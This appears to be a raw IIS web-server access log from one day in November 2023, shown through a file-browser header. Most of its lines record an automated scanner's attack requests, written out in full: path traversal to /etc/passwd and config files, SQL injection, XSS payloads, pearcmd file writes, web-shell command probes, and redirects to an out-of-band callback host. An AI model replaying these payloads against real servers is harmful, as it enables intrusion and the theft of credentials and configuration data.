????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231109.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-09 13:17:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-09 13:17:52 103.153.214.94 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 629 2023-11-09 13:17:52 103.153.214.94 GET /include/thumb.php dir=http\..\admin\login\login_check.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 390 2023-11-09 13:17:54 103.153.214.94 GET /seeyon/webmail.do method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 380 2023-11-09 13:17:54 103.153.214.94 POST /bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 392 2023-11-09 13:17:54 103.153.214.94 POST /WEB_VMS/LEVEL15/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 650 2023-11-09 13:17:55 103.153.214.94 GET /s=set&_method=__construct&method=*&filter[]=system - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 383 2023-11-09 13:17:55 103.153.214.94 GET /tool/log/c.php strip_slashes=printf&host=nl+c.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1214 2023-11-09 13:17:55 103.153.214.94 GET /install/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 384 2023-11-09 13:18:12 103.153.214.94 POST /index.php s=/home/page/uploadImg 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 385 2023-11-09 13:19:15 103.153.214.94 GET /api/v1/GetSrc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 2 4656 2023-11-09 13:19:16 103.153.214.94 POST /seeyon/htmlofficeservlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 1585 2023-11-09 13:19:17 103.153.214.94 GET /login.do message=923291*826419 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 395 2023-11-09 13:19:17 103.153.214.94 GET /api/v1/GetDevice - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 410 2023-11-09 13:19:21 103.153.214.94 GET /login/login.do message=923291*826419 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 398 2023-11-09 13:19:21 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2XwMOgZF0AkXOgRthrqHBvOYMho=ipconfig 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 406 2023-11-09 13:20:06 103.153.214.94 GET /common/download/resource resource=/profile/../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 391 2023-11-09 13:20:09 103.153.214.94 GET /common/download/resource resource=/profile/../../../../Windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 384 2023-11-09 13:20:17 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 5004 2023-11-09 13:20:19 103.153.214.94 GET /public/index.php/home/file/user_pics - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 414 2023-11-09 13:23:41 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 387 2023-11-09 13:23:41 103.153.214.94 GET /get_dkey.php user=admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 385 2023-11-09 13:23:47 103.153.214.94 GET /authenticationserverservlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 381 2023-11-09 13:23:47 103.153.214.94 GET /web/xml/webuser-auth.xml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 2306 2023-11-09 13:23:49 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(1) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1212 2023-11-09 13:24:14 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 384 2023-11-09 13:26:04 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 2133 2023-11-09 13:26:07 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 399 2023-11-09 13:28:26 103.153.214.94 GET /api/dp/rptsvcsyncpoint ccid=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 0 2 411 2023-11-09 13:28:38 103.153.214.94 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 404 2023-11-09 13:28:51 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 1586 2023-11-09 13:28:55 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 1568 2023-11-09 13:29:02 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 435 2023-11-09 13:29:03 103.153.214.94 GET /view/action/download_file.php filename=../../../../../../../../../etc/passwd&savename=yykik.txt 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 382 2023-11-09 13:29:03 103.153.214.94 GET /servlet/codesettree flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 397 2023-11-09 13:29:17 103.153.214.94 GET /upgrade/detail.jsp/login/LoginSSO.jsp id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 379 2023-11-09 13:29:20 103.153.214.94 POST /zentao/user-login.html - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn/zentao/user-login.html 405 0 1 1648 2023-11-09 13:29:26 103.153.214.94 POST /cgi-bin/rpc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 388 2023-11-09 13:30:01 103.153.214.94 GET /jshERP-boot/user/getAllList;.ico - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 404 2023-11-09 13:30:01 103.153.214.94 POST /WEB_VMS/LEVEL15/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 387 2023-11-09 13:30:01 103.153.214.94 GET /tool/log/c.php strip_slashes=printf&host=nl+c.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 384 2023-11-09 13:30:01 103.153.214.94 GET /seeyon/webmail.do method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 391 2023-11-09 13:30:03 103.153.214.94 GET /include/thumb.php dir=http\..\admin\login\login_check.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 383 2023-11-09 13:30:05 103.153.214.94 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 13:30:05 103.153.214.94 GET /s=set&_method=__construct&method=*&filter[]=system - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 13:30:05 103.153.214.94 GET /install/ - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 362 2023-11-09 13:30:10 103.153.214.94 POST /bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 64 4091 2023-11-09 13:30:25 103.153.214.94 POST /mobile/plugin/browser.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 413 2023-11-09 13:30:29 103.153.214.94 POST /index.php s=/home/page/uploadImg 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 389 2023-11-09 13:30:48 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 1539 2023-11-09 13:30:52 103.153.214.94 GET /images/logo/logo-eoffice.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 398 2023-11-09 13:30:52 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.188 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 498 2023-11-09 13:30:53 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.188 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 342 2023-11-09 13:31:35 103.153.214.94 GET /login.do message=888211*957860 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1095 2023-11-09 13:31:38 103.153.214.94 GET /login/login.do message=888211*957860 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 388 2023-11-09 13:31:42 103.153.214.94 GET /api/v1/GetSrc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 0 2 2652 2023-11-09 13:31:47 103.153.214.94 GET /api/v1/GetDevice - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 0 2 1262 2023-11-09 13:31:53 103.153.214.94 POST /seeyon/htmlofficeservlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 386 2023-11-09 13:31:57 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2XwNrvV3b541CeNRGML62LItpAf=ipconfig 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 394 2023-11-09 13:32:28 103.153.214.94 GET /common/download/resource resource=/profile/../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1320 2023-11-09 13:32:31 103.153.214.94 GET /common/download/resource resource=/profile/../../../../Windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 1162 2023-11-09 13:32:40 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 384 2023-11-09 13:32:42 103.153.214.94 GET /public/index.php/home/file/user_pics - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 383 2023-11-09 13:33:25 103.153.214.94 GET /level/16/exec/show/config/CR - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 417 2023-11-09 13:33:32 103.153.214.94 GET /users/sign_in - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 374 2023-11-09 13:34:05 103.153.214.94 GET / lang=../../../../../usr/local/php/pearcmd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 406 2023-11-09 13:34:08 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 385 2023-11-09 13:34:11 103.153.214.94 GET / +config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+DJRN2aWfkM.log 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 436 2023-11-09 13:34:32 103.153.214.94 POST /uapjs/jsinvoke/ action=invoke 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 1566 2023-11-09 13:34:36 103.153.214.94 GET /2XwMP3SxSBQgzuLSz3Fqm2rs90y.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 387 2023-11-09 13:34:43 103.153.214.94 GET /mail/src/compose.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 386 2023-11-09 13:35:07 103.153.214.94 GET /index.php redirect=http%3A%2F%2Fwww.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 393 2023-11-09 13:35:10 103.153.214.94 GET /names.nsf/People OpenView 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1120 2023-11-09 13:35:31 103.153.214.94 GET /public/index.php s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 1077 2023-11-09 13:35:31 103.153.214.94 GET /get_dkey.php user=admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 381 2023-11-09 13:35:34 103.153.214.94 GET /authenticationserverservlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 391 2023-11-09 13:35:34 103.153.214.94 GET /web/xml/webuser-auth.xml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 396 2023-11-09 13:35:41 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(1) 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 380 2023-11-09 13:35:47 103.153.214.94 GET /sap/bc/BSp/sap/menu/fameset.htm sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 389 2023-11-09 13:35:57 103.153.214.94 GET /search.htm searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 398 2023-11-09 13:36:00 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 394 2023-11-09 13:37:29 103.153.214.94 GET /horde/admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 392 2023-11-09 13:37:36 103.153.214.94 GET /admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 301 0 0 2121 2023-11-09 13:37:45 103.153.214.94 GET /jira/secure/BrowseProject.jspa id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 384 2023-11-09 13:37:54 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 1982 2023-11-09 13:37:56 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 403 2023-11-09 13:38:05 103.153.214.94 GET /src/redirect.php plugins[]=../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 397 2023-11-09 13:38:32 103.153.214.94 GET /index.php option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 388 2023-11-09 13:38:32 103.153.214.94 GET /redirect.php/"><script>alert(document.domain)</script> subject=server&server=test 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 384 2023-11-09 13:38:47 103.153.214.94 GET /wp-content/plugins/sniplets/view/sniplets/warning.php text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 387 2023-11-09 13:39:09 103.153.214.94 POST /login.action - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 386 2023-11-09 13:39:24 103.153.214.94 GET /wp-content/plugins/sniplets/modules/syntax_highlight.php libpath=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 392 2023-11-09 13:39:57 103.153.214.94 GET /index.php appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 386 2023-11-09 13:40:23 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 414 2023-11-09 13:40:29 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 1681 2023-11-09 13:40:34 103.153.214.94 GET /api/dp/rptsvcsyncpoint ccid=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 2796 2023-11-09 13:40:39 103.153.214.94 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 1813 2023-11-09 13:40:44 103.153.214.94 GET /exchweb/bin/redir.asp URL=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 8 0 3211 2023-11-09 13:40:50 103.153.214.94 GET /CookieAuth.dll GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1981 2023-11-09 13:40:52 103.153.214.94 GET /servlet/codesettree 